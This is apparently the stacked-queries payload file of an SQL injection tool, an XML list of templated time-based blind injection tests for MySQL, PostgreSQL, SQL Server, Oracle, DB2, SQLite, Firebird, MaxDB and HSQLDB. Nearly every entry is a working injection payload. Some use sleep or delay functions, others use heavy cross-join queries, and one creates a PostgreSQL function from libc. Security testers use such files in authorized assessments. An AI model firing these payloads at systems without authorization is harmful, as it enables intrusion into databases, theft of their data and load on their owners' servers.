Path: blob/master/data/xml/payloads/stacked_queries.xml
2992 views
<?xml version="1.0" encoding="UTF-8"?>12<root>3<!-- Stacked queries tests -->4<test>5<title>MySQL >= 5.0.12 stacked queries (comment)</title>6<stype>4</stype>7<level>2</level>8<risk>1</risk>9<clause>1-8</clause>10<where>1</where>11<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>12<request>13<payload>;SELECT SLEEP([SLEEPTIME])</payload>14<comment>#</comment>15</request>16<response>17<time>[SLEEPTIME]</time>18</response>19<details>20<dbms>MySQL</dbms>21<dbms_version>>= 5.0.12</dbms_version>22</details>23</test>2425<test>26<title>MySQL >= 5.0.12 stacked queries</title>27<stype>4</stype>28<level>3</level>29<risk>1</risk>30<clause>1-8</clause>31<where>1</where>32<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>33<request>34<payload>;SELECT SLEEP([SLEEPTIME])</payload>35</request>36<response>37<time>[SLEEPTIME]</time>38</response>39<details>40<dbms>MySQL</dbms>41<dbms_version>>= 5.0.12</dbms_version>42</details>43</test>4445<test>46<title>MySQL >= 5.0.12 stacked queries (query SLEEP - comment)</title>47<stype>4</stype>48<level>3</level>49<risk>1</risk>50<clause>1-8</clause>51<where>1</where>52<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>53<request>54<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>55<comment>#</comment>56</request>57<response>58<time>[SLEEPTIME]</time>59</response>60<details>61<dbms>MySQL</dbms>62<dbms_version>>= 5.0.12</dbms_version>63</details>64</test>6566<test>67<title>MySQL >= 5.0.12 stacked queries (query SLEEP)</title>68<stype>4</stype>69<level>4</level>70<risk>1</risk>71<clause>1-8</clause>72<where>1</where>73<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>74<request>75<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>76</request>77<response>78<time>[SLEEPTIME]</time>79</response>80<details>81<dbms>MySQL</dbms>82<dbms_version>>= 5.0.12</dbms_version>83</details>84</test>8586<test>87<title>MySQL < 5.0.12 stacked queries (BENCHMARK - comment)</title>88<stype>4</stype>89<level>3</level>90<risk>2</risk>91<clause>1-8</clause>92<where>1</where>93<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>94<request>95<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>96<comment>#</comment>97</request>98<response>99<time>[DELAYED]</time>100</response>101<details>102<dbms>MySQL</dbms>103</details>104</test>105106<test>107<title>MySQL < 5.0.12 stacked queries (BENCHMARK)</title>108<stype>4</stype>109<level>5</level>110<risk>2</risk>111<clause>1-8</clause>112<where>1</where>113<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>114<request>115<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>116</request>117<response>118<time>[DELAYED]</time>119</response>120<details>121<dbms>MySQL</dbms>122</details>123</test>124125<test>126<title>PostgreSQL > 8.1 stacked queries (comment)</title>127<stype>4</stype>128<level>1</level>129<risk>1</risk>130<clause>1-8</clause>131<where>1</where>132<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>133<request>134<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>135<comment>--</comment>136</request>137<response>138<time>[SLEEPTIME]</time>139</response>140<details>141<dbms>PostgreSQL</dbms>142<dbms_version>> 8.1</dbms_version>143</details>144</test>145146<test>147<title>PostgreSQL > 8.1 stacked queries</title>148<stype>4</stype>149<level>4</level>150<risk>1</risk>151<clause>1-8</clause>152<where>1</where>153<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>154<request>155<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>156</request>157<response>158<time>[SLEEPTIME]</time>159</response>160<details>161<dbms>PostgreSQL</dbms>162<dbms_version>> 8.1</dbms_version>163</details>164</test>165166<test>167<title>PostgreSQL stacked queries (heavy query - comment)</title>168<stype>4</stype>169<level>2</level>170<risk>2</risk>171<clause>1-8</clause>172<where>1</where>173<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>174<request>175<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>176<comment>--</comment>177</request>178<response>179<time>[DELAYED]</time>180</response>181<details>182<dbms>PostgreSQL</dbms>183</details>184</test>185186<test>187<title>PostgreSQL stacked queries (heavy query)</title>188<stype>4</stype>189<level>5</level>190<risk>2</risk>191<clause>1-8</clause>192<where>1</where>193<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>194<request>195<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>196</request>197<response>198<time>[DELAYED]</time>199</response>200<details>201<dbms>PostgreSQL</dbms>202</details>203</test>204205<test>206<title>PostgreSQL < 8.2 stacked queries (Glibc - comment)</title>207<stype>4</stype>208<level>3</level>209<risk>1</risk>210<clause>1-8</clause>211<where>1</where>212<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>213<request>214<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>215<comment>--</comment>216</request>217<response>218<time>[SLEEPTIME]</time>219</response>220<details>221<dbms>PostgreSQL</dbms>222<dbms_version>< 8.2</dbms_version>223<os>Linux</os>224</details>225</test>226227<test>228<title>PostgreSQL < 8.2 stacked queries (Glibc)</title>229<stype>4</stype>230<level>5</level>231<risk>1</risk>232<clause>1-8</clause>233<where>1</where>234<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>235<request>236<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>237</request>238<response>239<time>[SLEEPTIME]</time>240</response>241<details>242<dbms>PostgreSQL</dbms>243<dbms_version>< 8.2</dbms_version>244<os>Linux</os>245</details>246</test>247248<test>249<title>Microsoft SQL Server/Sybase stacked queries (comment)</title>250<stype>4</stype>251<level>1</level>252<risk>1</risk>253<clause>1-8</clause>254<where>1</where>255<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>256<request>257<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>258<comment>--</comment>259</request>260<response>261<time>[SLEEPTIME]</time>262</response>263<details>264<dbms>Microsoft SQL Server</dbms>265<dbms>Sybase</dbms>266</details>267</test>268269<test>270<title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>271<stype>4</stype>272<level>2</level>273<risk>1</risk>274<clause>1-8</clause>275<where>1</where>276<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>277<request>278<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>279<comment>--</comment>280</request>281<response>282<time>[SLEEPTIME]</time>283</response>284<details>285<dbms>Microsoft SQL Server</dbms>286<dbms>Sybase</dbms>287</details>288</test>289290<test>291<title>Microsoft SQL Server/Sybase stacked queries</title>292<stype>4</stype>293<level>4</level>294<risk>1</risk>295<clause>1-8</clause>296<where>1</where>297<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>298<request>299<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>300</request>301<response>302<time>[SLEEPTIME]</time>303</response>304<details>305<dbms>Microsoft SQL Server</dbms>306<dbms>Sybase</dbms>307</details>308</test>309310<test>311<title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>312<stype>4</stype>313<level>5</level>314<risk>1</risk>315<clause>1-8</clause>316<where>1</where>317<vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>318<request>319<payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>320</request>321<response>322<time>[SLEEPTIME]</time>323</response>324<details>325<dbms>Microsoft SQL Server</dbms>326<dbms>Sybase</dbms>327</details>328</test>329330<test>331<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>332<stype>4</stype>333<level>1</level>334<risk>1</risk>335<clause>1-8</clause>336<where>1</where>337<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>338<request>339<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>340<comment>--</comment>341</request>342<response>343<time>[SLEEPTIME]</time>344</response>345<details>346<dbms>Oracle</dbms>347</details>348</test>349350<test>351<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>352<stype>4</stype>353<level>4</level>354<risk>1</risk>355<clause>1-8</clause>356<where>1</where>357<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>358<request>359<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>360</request>361<response>362<time>[SLEEPTIME]</time>363</response>364<details>365<dbms>Oracle</dbms>366</details>367</test>368369<test>370<title>Oracle stacked queries (heavy query - comment)</title>371<stype>4</stype>372<level>2</level>373<risk>2</risk>374<clause>1-8</clause>375<where>1</where>376<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>377<request>378<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>379<comment>--</comment>380</request>381<response>382<time>[DELAYED]</time>383</response>384<details>385<dbms>Oracle</dbms>386</details>387</test>388389<test>390<title>Oracle stacked queries (heavy query)</title>391<stype>4</stype>392<level>5</level>393<risk>2</risk>394<clause>1-8</clause>395<where>1</where>396<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>397<request>398<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>399</request>400<response>401<time>[DELAYED]</time>402</response>403<details>404<dbms>Oracle</dbms>405</details>406</test>407408<test>409<title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>410<stype>4</stype>411<level>4</level>412<risk>1</risk>413<clause>1-8</clause>414<where>1</where>415<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>416<request>417<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>418<comment>--</comment>419</request>420<response>421<time>[SLEEPTIME]</time>422</response>423<details>424<dbms>Oracle</dbms>425</details>426</test>427428<test>429<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>430<stype>4</stype>431<level>5</level>432<risk>1</risk>433<clause>1-8</clause>434<where>1</where>435<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>436<request>437<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>438</request>439<response>440<time>[SLEEPTIME]</time>441</response>442<details>443<dbms>Oracle</dbms>444</details>445</test>446447<test>448<title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>449<stype>4</stype>450<level>5</level>451<risk>1</risk>452<clause>1-8</clause>453<where>1</where>454<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>455<request>456<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>457<comment>--</comment>458</request>459<response>460<time>[SLEEPTIME]</time>461</response>462<details>463<dbms>Oracle</dbms>464</details>465</test>466467<test>468<title>Oracle stacked queries (USER_LOCK.SLEEP)</title>469<stype>4</stype>470<level>5</level>471<risk>1</risk>472<clause>1-8</clause>473<where>1</where>474<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>475<request>476<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>477</request>478<response>479<time>[SLEEPTIME]</time>480</response>481<details>482<dbms>Oracle</dbms>483</details>484</test>485486<test>487<title>IBM DB2 stacked queries (heavy query - comment)</title>488<stype>4</stype>489<level>3</level>490<risk>2</risk>491<clause>1-8</clause>492<where>1</where>493<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>494<request>495<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>496<comment>--</comment>497</request>498<response>499<time>[DELAYED]</time>500</response>501<details>502<dbms>IBM DB2</dbms>503</details>504</test>505506<test>507<title>IBM DB2 stacked queries (heavy query)</title>508<stype>4</stype>509<level>5</level>510<risk>2</risk>511<clause>1-8</clause>512<where>1</where>513<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>514<request>515<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>516</request>517<response>518<time>[DELAYED]</time>519</response>520<details>521<dbms>IBM DB2</dbms>522</details>523</test>524525<test>526<title>SQLite > 2.0 stacked queries (heavy query - comment)</title>527<stype>4</stype>528<level>3</level>529<risk>2</risk>530<clause>1-8</clause>531<where>1</where>532<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>533<request>534<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>535<comment>--</comment>536</request>537<response>538<time>[DELAYED]</time>539</response>540<details>541<dbms>SQLite</dbms>542<dbms_version>> 2.0</dbms_version>543</details>544</test>545546<test>547<title>SQLite > 2.0 stacked queries (heavy query)</title>548<stype>4</stype>549<level>5</level>550<risk>2</risk>551<clause>1-8</clause>552<where>1</where>553<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>554<request>555<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>556</request>557<response>558<time>[DELAYED]</time>559</response>560<details>561<dbms>SQLite</dbms>562<dbms_version>> 2.0</dbms_version>563</details>564</test>565566<test>567<title>Firebird stacked queries (heavy query - comment)</title>568<stype>4</stype>569<level>4</level>570<risk>2</risk>571<clause>1-8</clause>572<where>1</where>573<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>574<request>575<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>576<comment>--</comment>577</request>578<response>579<time>[DELAYED]</time>580</response>581<details>582<dbms>Firebird</dbms>583<dbms_version>>= 2.0</dbms_version>584</details>585</test>586587<test>588<title>Firebird stacked queries (heavy query)</title>589<stype>4</stype>590<level>5</level>591<risk>2</risk>592<clause>1-8</clause>593<where>1</where>594<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>595<request>596<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>597</request>598<response>599<time>[DELAYED]</time>600</response>601<details>602<dbms>Firebird</dbms>603<dbms_version>>= 2.0</dbms_version>604</details>605</test>606607<test>608<title>SAP MaxDB stacked queries (heavy query - comment)</title>609<stype>4</stype>610<level>4</level>611<risk>2</risk>612<clause>1-8</clause>613<where>1</where>614<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>615<request>616<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>617<comment>--</comment>618</request>619<response>620<time>[DELAYED]</time>621</response>622<details>623<dbms>SAP MaxDB</dbms>624</details>625</test>626627<test>628<title>SAP MaxDB stacked queries (heavy query)</title>629<stype>4</stype>630<level>5</level>631<risk>2</risk>632<clause>1-8</clause>633<where>1</where>634<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>635<request>636<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>637</request>638<response>639<time>[DELAYED]</time>640</response>641<details>642<dbms>SAP MaxDB</dbms>643</details>644</test>645646<test>647<title>HSQLDB >= 1.7.2 stacked queries (heavy query - comment)</title>648<stype>4</stype>649<level>4</level>650<risk>2</risk>651<clause>1-8</clause>652<where>1</where>653<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>654<request>655<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>656<comment>--</comment>657</request>658<response>659<time>[SLEEPTIME]</time>660</response>661<details>662<dbms>HSQLDB</dbms>663<dbms_version>>= 1.7.2</dbms_version>664</details>665</test>666667<test>668<title>HSQLDB >= 1.7.2 stacked queries (heavy query)</title>669<stype>4</stype>670<level>5</level>671<risk>2</risk>672<clause>1-8</clause>673<where>1</where>674<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>675<request>676<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>677</request>678<response>679<time>[SLEEPTIME]</time>680</response>681<details>682<dbms>HSQLDB</dbms>683<dbms_version>>= 1.7.2</dbms_version>684</details>685</test>686687<test>688<title>HSQLDB >= 2.0 stacked queries (heavy query - comment)</title>689<stype>4</stype>690<level>4</level>691<risk>2</risk>692<clause>1-8</clause>693<where>1</where>694<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>695<request>696<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>697<comment>--</comment>698</request>699<response>700<time>[SLEEPTIME]</time>701</response>702<details>703<dbms>HSQLDB</dbms>704<dbms_version>>= 2.0</dbms_version>705</details>706</test>707708<test>709<title>HSQLDB >= 2.0 stacked queries (heavy query)</title>710<stype>4</stype>711<level>5</level>712<risk>2</risk>713<clause>1-8</clause>714<where>1</where>715<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>716<request>717<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>718</request>719<response>720<time>[SLEEPTIME]</time>721</response>722<details>723<dbms>HSQLDB</dbms>724<dbms_version>>= 2.0</dbms_version>725</details>726</test>727<!-- TODO: if possible, add payload for Microsoft Access -->728<!-- End of stacked queries tests -->729</root>730731732